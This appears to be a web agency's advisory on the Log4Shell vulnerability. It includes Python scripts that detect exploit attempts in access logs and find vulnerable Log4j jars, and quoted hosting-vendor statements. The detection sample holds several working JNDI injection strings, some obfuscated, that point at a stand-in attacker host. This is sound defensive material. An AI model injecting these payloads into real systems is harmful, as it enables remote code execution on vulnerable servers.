By now, you’ve probably heard about the most recent cybersecurity panic regarding a vulnerability in Log4j, a widely used Java logging library. At Yoko Co, we take cybersecurity very seriously, so we want to provide some clarity on this quick-moving issue, along with a summary of how it’s affecting a range of popular web hosts and services. This article may be updated as we learn more about the situation, so make a note to check back for the latest news.
Before we get into the details: If you’re currently a Yoko Co client, here’s a quick summary of what you need to know.
- If we host your website, you do not need to worry about Log4j.
- If we do not host your website, reach out to your hosting provider to ask how this is impacting your website. (If you’re not sure how to handle this, we can help.)
- If you’re using HubSpot, they have stated that they found no indication of impact on their systems and are continuing to monitor (see their statement below). No customer action is required at this time.
What is Log4j?
Log4j is an open-source logging library for the Java programming language, maintained by the Apache Software Foundation. Java applications use it to write a record of what they are doing (requests handled, errors, user actions) to log files or to a central log collector. Because Java is so widely used for server-side software, Log4j turns up in a huge range of products: application servers, search engines, CRMs, monitoring tools, and many cloud services. Note that the Apache HTTP Server, the web server software that runs many WordPress sites, is a separate project written in C and does not use Log4j; sharing the “Apache” name does not mean a server is affected.
What is the Log4j vulnerability?
The vulnerability, tracked as CVE-2021-44228 and nicknamed “Log4Shell,” was reported privately to the Log4j maintainers on November 24th, 2021 and disclosed publicly on December 9th, 2021. It affects Log4j 2 versions 2.0-beta9 through 2.14.1. The flaw is that Log4j interprets special ${...} lookup strings inside the text it logs: if an attacker can get a string such as ${jndi:ldap://attacker-host/a} into any field that the application logs (a browser User-Agent header, a search query, a username on a login form), vulnerable versions contact the attacker’s server, download code from it, and run that code with the privileges of the application. Because almost anything a visitor sends can end up in a log line, the attacker needs no account or special access, and a single request can take over the system. In practice, this means that bad actors can:
- See sensitive user data
- Install malware and spyware
- Use the machine(s) for nefarious purposes
You may read a lot of hyperbolic statements about this vulnerability, and for good reason: This is a very big issue.
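Because the trigger is just a string in any logged field, the most useful check a site owner can run is to look through the web server’s access logs for exploitation attempts, including the URL-encoded and obfuscated forms attackers use to slip past naive pattern matching. The script below is an added example written for this article, not code from the original post or from any vendor quoted here. The log lines in it are constructed, and the lookup-collapsing rules cover the common obfuscations (nested ${lower:...} and ${upper:...} wrappers and ${env:...:-x} default tricks), not every possible variant.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Nginx combined log format. These are
# made up for this example and use documentation IP ranges; they are not
# traffic from any real site.
SAMPLE_LOG = '''
203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.7/x} HTTP/1.1" 200 512 "-" "curl/7.79"
203.0.113.9 - - [10/Dec/2021:10:00:04 +0000] "GET /?s=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"
203.0.113.12 - - [10/Dec/2021:10:00:05 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//198.51.100.7/a}"
203.0.113.5 - - [10/Dec/2021:10:00:06 +0000] "GET /blog/log4j-advisory HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
'''

# One innermost ${...} lookup: nothing nested inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup as it appears after normalisation, e.g. ${jndi:ldap://host/a}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def _resolve_lookup(m: "re.Match") -> str:
    """Collapse the lookups attackers use purely for obfuscation.
    Anything else (jndi itself, unknown lookup names) is left untouched."""
    body = m.group(1)
    # ${env:X:-j}, ${sys:X:-j}, ${::-j}: an undefined name with a default
    # evaluates to the default, so the default text is the payload fragment.
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep:
        if name.strip().lower() == "lower":
            return arg.lower()
        if name.strip().lower() == "upper":
            return arg.upper()
    return m.group(0)


def normalize(raw: str, max_rounds: int = 8) -> str:
    """Undo URL encoding (possibly applied more than once), then repeatedly
    resolve innermost obfuscation lookups until the text stops changing."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_lookup, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_log(text: str) -> list:
    """Return (line_number, decoded_payload) for every line that carries a
    JNDI lookup once URL encoding and obfuscation are stripped away."""
    hits = []
    for number, line in enumerate(text.strip().splitlines(), start=1):
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append((number, m.group(0)))
    return hits


if __name__ == "__main__":
    for number, payload in scan_log(SAMPLE_LOG):
        print(f"line {number}: {payload}")
```

To check a real log, call scan_log() on the contents of your access log file instead of SAMPLE_LOG. A hit means someone tried the exploit against your site, not that it succeeded: a PHP-only WordPress host logs the attempt and ignores it, while a Java service that received the same string may have been exploited. Keep the decoded payloads, since the attacker’s callback host in them is exactly what your vendors will want when they investigate their own logs.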
Is My WordPress Site Affected by Log4j?
While we are still learning about the pervasiveness of this vulnerability, a few patterns exist:
- Most WordPress websites are unlikely to be affected directly by this vulnerability: WordPress itself, and its plugins and themes, are written in PHP and do not use Java, so Log4j is not part of the software that renders your site. If you host with Yoko Co or on a Managed WordPress solution like WPEngine, Kinsta, or Pantheon, your servers are highly unlikely to run Log4j. The exception is a site that uses a Java-based add-on service on the same host, such as an Elasticsearch search backend, which is why Kinsta’s statement below calls that case out.
- CloudFlare is a CDN and optimization service that sits in front of many WordPress websites (along with a lot of other things), and they have announced that some of their own systems used Log4j. They took quick action to patch, and have been helping their customers and other service providers limit exposure, including with web application firewall rules that block the common exploit strings. Because CloudFlare proxies every request to a site it fronts, including requests from logged-in users, a site owner cannot assume that only public data passed through it; whether any customer traffic was exposed before the patch is a question to put to CloudFlare directly (see the vendor questions below).
- The services most likely to be exposed are Java-based platforms that receive data from your site: CRMs and marketing-automation tools, search backends, analytics and logging services. For a WordPress site, the realistic path to exposure is through an integration with one of these systems, because anything your site forwards to them (form submissions, search queries, contact details) may be logged, and therefore processed by Log4j, on their side.
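If you run your own server (a VPS, a cPanel box, or similar) rather than a managed WordPress host, the practical check is whether any Log4j 2 jar is present at all and, if so, which version. Below is an added example, not code from the original post or from any hosting vendor: a Python script that walks a directory tree, reads each Log4j jar’s manifest for its version, and checks whether the JndiLookup class (the component that performs the dangerous lookup, and whose removal was the official interim mitigation) is still inside it. The version thresholds are the published Log4j release facts (CVE-2021-44228 fixed in 2.15.0, with 2.12.2 and 2.3.1 as the Java 7 and Java 6 backports; 2.17.1 is the commonly recommended floor), and the sample jars it creates are empty stubs built in a temporary directory for demonstration only.

```python
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass

# Path of the class that performs the JNDI lookup inside log4j-core.
# Deleting it from the jar was the official interim mitigation for 2.10 <= version < 2.15.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Matches log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar and log4j-1.2.17.jar,
# but not log4j-api-*.jar (which does not contain the vulnerable code).
JAR_NAME = re.compile(r"^log4j(?:-core)?-(\d+)\.(\d+)(?:\.(\d+))?[^/]*\.jar$")
MANIFEST_VERSION = re.compile(r"^Implementation-Version:\s*(\d+)\.(\d+)(?:\.(\d+))?", re.M)


@dataclass
class Finding:
    path: str
    version: tuple
    has_jndi_lookup: bool
    status: str


def _to_tuple(m: "re.Match") -> tuple:
    return tuple(int(g) if g else 0 for g in m.groups())


def status_for(version: tuple, has_jndi_lookup: bool) -> str:
    major, minor, patch = version
    if major != 2:
        return "not Log4j 2.x: CVE-2021-44228 does not apply (1.x is end-of-life; upgrade anyway)"
    # 2.15.0 fixed CVE-2021-44228 on the main line; 2.12.2 (Java 7) and
    # 2.3.1 (Java 6) are the backport releases carrying the same fix.
    fixed = version >= (2, 15, 0) or (minor == 12 and patch >= 2) or (minor == 3 and patch >= 1)
    if not fixed:
        if has_jndi_lookup:
            return "VULNERABLE: CVE-2021-44228 (upgrade to 2.17.1 or newer)"
        return "mitigated: JndiLookup.class removed, but still upgrade"
    return "patched for CVE-2021-44228 (2.17.1 or newer is the recommended floor)"


def inspect_jar(path: str) -> Finding:
    """Read the jar's manifest (falling back to the file name) for its version
    and check whether the JndiLookup class is still present."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            m = MANIFEST_VERSION.search(jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
            if m:
                version = _to_tuple(m)
        if version is None:
            version = _to_tuple(JAR_NAME.match(os.path.basename(path)))
        has_jndi = JNDI_LOOKUP_CLASS in names
    return Finding(path, version, has_jndi, status_for(version, has_jndi))


def scan_tree(root: str) -> list:
    """Walk a directory tree and inspect every Log4j jar found by name.
    Jars repackaged inside .war/.ear files or fat jars are not seen by
    this name-based walk; apply inspect_jar's zip check to those too."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if JAR_NAME.match(name):
                findings.append(inspect_jar(os.path.join(dirpath, name)))
    return findings


def build_demo_tree() -> str:
    """Constructed sample jars (stubs with a manifest only), not real Log4j."""
    root = tempfile.mkdtemp(prefix="log4j-scan-demo-")
    samples = [
        ("app/lib/log4j-core-2.14.1.jar", "2.14.1", True),      # vulnerable
        ("search/lib/log4j-core-2.14.1.jar", "2.14.1", False),  # class stripped
        ("tools/log4j-core-2.17.1.jar", "2.17.1", True),        # patched release
        ("legacy/log4j-1.2.17.jar", "1.2.17", False),           # Log4j 1.x
    ]
    for rel, ver, with_jndi in samples:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with zipfile.ZipFile(full, "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {ver}\n")
            if with_jndi:
                jar.writestr(JNDI_LOOKUP_CLASS, b"")
    return root


if __name__ == "__main__":
    for f in scan_tree(build_demo_tree()):
        print(f"{f.path}: version {'.'.join(map(str, f.version))}, "
              f"JndiLookup present: {f.has_jndi_lookup} -> {f.status}")
```

On a real host, point scan_tree() at / (or at the install directories of whatever Java software runs on the box) instead of the demo tree. A clean result from a name-based walk is necessary but not sufficient: Log4j is often bundled inside application archives and fat jars, so those archives need the same zip inspection.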
What should I ask my vendors about Log4j?
By now, most service providers and vendors will have done a thorough investigation into their exposure risk, so you should be able to contact them with questions such as:
- Do you use the Log4j library anywhere in the systems that handle my data?
- If so, which version were you running, and when did you upgrade to a patched release (2.17.1 or later) or apply a mitigation?
- Has my data been compromised by any exploitation of the Log4j vulnerability, and how did you determine that?
- What can I do to safeguard my data, such as rotating the API keys or passwords used for the integration?
What should I do to mitigate my risk?
While the full effects of this vulnerability are still being assessed, the motive behind most attacks is consistent: money, extracted through ransomware, account takeover, and identity theft. The best first step is to review your cybersecurity practices with your web or IT vendor. The following practices limit the damage if any of your data is exposed, whether through this vulnerability directly or through a vendor that was compromised by it:
- Use a password manager to generate and store a unique, random password for every account. A useful rule of thumb: if you can remember a password, it is probably too weak. Never reuse a password across accounts.
- Turn on two-factor authentication everywhere it is offered.
- Change the passwords and API keys for critical systems immediately if a vendor tells you it was affected, and review them on a regular basis (2-3 times a year, if possible).
Which platforms are affected by Log4j?
Our team has been reaching out to popular hosting platforms and vendors to get a status on their Log4j exposure and risk mitigation efforts. We will keep this updated as more information becomes available.
Is Kinsta.com affected by Log4j?
Statement from Kinsta.com on 12/15/21
The log4j/Log4Shell (CVE-2021-44228) only affects Java software that uses the log4j library. The only Java software ever supported on Kinsta was ElasticSearch, and we have several mitigations in place which prevent any exploitation of this, and if you don’t have ElasticSearch on your WordPress site you are unaffected.
Is WPEngine.com affected by Log4j?
Statement from WPEngine on 12/15/21
At WP Engine, Log4J is NOT used for any customer-facing or internet-facing systems.
As such, you are covered from this vulnerability and can rest assured your website is not impacted.
Is HubSpot.com affected by Log4j?
Statement from HubSpot on 12/14/21
HubSpot is aware of CVE-2021-44228 and we have performed a thorough check of our systems and have seen no indications of any impact from this vulnerability at this time. Out of an abundance of caution, our team is continuing to monitor this event. Customers don’t need to take any action at this time.
Is CloudFlare affected by Log4j?
Status: Resolved and helped integrated systems limit exposure
Is Pantheon.io affected by Log4j?
Is Google Analytics affected by Log4j?
Status: Ongoing mitigation efforts across all Google Cloud Services
Are Google Ad Services affected by Log4j?
Is Salesforce affected by Log4j?
Is cPanel affected by Log4j?
Is AWS affected by Log4j?
Is GitHub affected by Log4j?
Take Control of Your Cybersecurity
We know that cybersecurity best practices are ever-evolving, and we aim to take an adaptive, responsive approach to evolve with them. If you have questions about your digital presence or website cybersecurity, we encourage you to get in touch.